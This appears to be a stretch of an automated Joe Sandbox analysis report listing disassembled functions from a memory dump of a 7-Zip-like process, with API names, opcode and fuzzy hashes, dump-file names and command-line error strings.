                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                • Instruction ID: ba9752c96330416a3f0d51e8f45dd0a06261f5d1c54a385f7342bbbf7f989a8c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A141053220C7C881CB35AF29D4902BE7770D7A2B9CF188112EB9A07795DF79D586C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1818558235-0
                                                                                                                                                                                                                                • Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                                                • Instruction ID: 47430fbcc8bafc3bbbe1d3cfe2f65c2549ef4c97995d8a949bf08a67b7f5893c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60314DB27112948B8B64DF7AD49242D73E4E768FD83188026DF2D97709DB30DC92CB90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                • Instruction ID: bb874fbb0eb54c23694450a9c2cd2d11a6675aad7176b1cbf40d3e60180cd939
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0902225A69081CA10FF32C49562E6730FBF7F80F08A063EB6E63716CF38D406C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                • Instruction ID: 333c99c1a3db3880cc2c99477348d234a35b7f2b1c5c790e8df556eb58235f2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F0302225AA8081CA14FF32C4A562F6730F7E3F85F099053EB6E63712CF78D446C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                • Instruction ID: c1e7cc83ac3c1a80b513546c6afd0a15a392b553df3eabc15430867efd5fe35b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF0122225AA8145CA10FF32C85562F6730F7E3F85F095053DB5E63711CF38D406C614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                • Instruction ID: 1bc4046eec210907d70df016ea9f4d57d3d832dd657437a99e85abba706e2d33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0302225A68081CA10FF32C4A562E6730FBE7F81F099093EF6E53712CF38D406C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                • Instruction ID: 7a5e8136a1d3d933e3487be501c07ad9e876221a95fdda1e050c296fbca5aecb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF0D02225A69185CA14FF32C45562E6731FBE7F81F099463EB6E63716CF38D806C614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                • Instruction ID: 7bf7df33558dcde4379e87dde5f4e29e3db05445cfaa95b6b81d7d73b13602ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0DA22256A8185CA14FF32D46562F6330FBE7F81F09A463EB6E63712CF38D406C619
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                • Instruction ID: 3515e0fdb8802d023b6f57ca1bc08ecea24477357d67ced139bb3ac9b065c461
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0FE21256A8085CA14FF32C46562E6330FBE7F81F08A463EB6E63712CF38D406C614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputsmemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 469995913-0
                                                                                                                                                                                                                                • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                • Instruction ID: 1288793d15a483269f41fa958099635f9b950675d6e9e8b50b8b40d147aee0b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BF0A92225194481CB10FF31D89252D2331E7F2F68B089262EF7D573AACF30D852C368
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3584677832-0
                                                                                                                                                                                                                                • Opcode ID: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                                                • Instruction ID: dff971a9284932d7212396bcaa0e5e188ae1cf4373b6c8de42b162c4b8f5f616
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A51B173201A8886CF20EF16D59017D7371F3A4BD8B598126EBAA4B738DF35D986CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                                                • API String ID: 1294909896-2104980125
                                                                                                                                                                                                                                • Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                • Instruction ID: 4e474d9ca66e221165c5c6f3d49e1ffa479f13edf97729f12628ffadce5811fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D051E5722146D0B6CF34EF24E5843BD7761F3A2394F849223D6AA47756EB38C986CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E04EE
                                                                                                                                                                                                                                  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFF2F
                                                                                                                                                                                                                                  • Part of subcall function 001DFEC8: free.MSVCRT ref: 001DFFAE
                                                                                                                                                                                                                                  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFFD1
                                                                                                                                                                                                                                  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFFF7
                                                                                                                                                                                                                                  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001E002B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E0523
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001E0564
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                                                • API String ID: 3129652135-1817034180
                                                                                                                                                                                                                                • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                • Instruction ID: 1b45c29d02b5ef937c00518f763ed6982917261f5a37c422cf9295bb40ea8022
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A51E423208AC485CB22DF16E4507AEBB70F799794F558117EF8907B59DBB8C9C6CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                • API String ID: 1534225298-1885708031
                                                                                                                                                                                                                                • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                • Instruction ID: c3340c0325fa89ee2884fd61834096105257af91e6867a392e1d268faaf6c546
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37517226324B8482CB60CF25E48036E7761F7D9B90F594616EBAE437A6DF78C899C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memsetstrlen$fputs
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2256168112-2735817509
                                                                                                                                                                                                                                • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                • Instruction ID: 2f59a87638e0d15ed73fef6b83f3c7ba8a8a1e5f69d08f503db0a8f75987819d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41D8723146C195CB34DB25E8503EF67A5F7A4B88F485526EE8907719CF78C5E9CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastfree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2167247754-0
                                                                                                                                                                                                                                • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                • Instruction ID: 2ea9a30e2cc06f9019598ed68243913525e533ae50c090f5746d99c399c47063
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41DB2221868445CA24EF15E4A136EB320F7E2764F500327EBED87BD9DF38C946D704
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$FileMove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 288606353-0
                                                                                                                                                                                                                                • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                • Instruction ID: 48c33122db14a432a8ac8a4785d516e49607e03688b9f13f9eef8f2fd44e3d76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3511B42334455085CE60EE25E8506AB57209BE2BD0F48A223FEFA97765DF39CC8AC600
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D794C: FindClose.KERNELBASE ref: 001D795E
                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 001D7BAA
                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 001D7BB9
                                                                                                                                                                                                                                • FindFirstStreamW.KERNELBASE ref: 001D7BDB
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 001D7BEA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
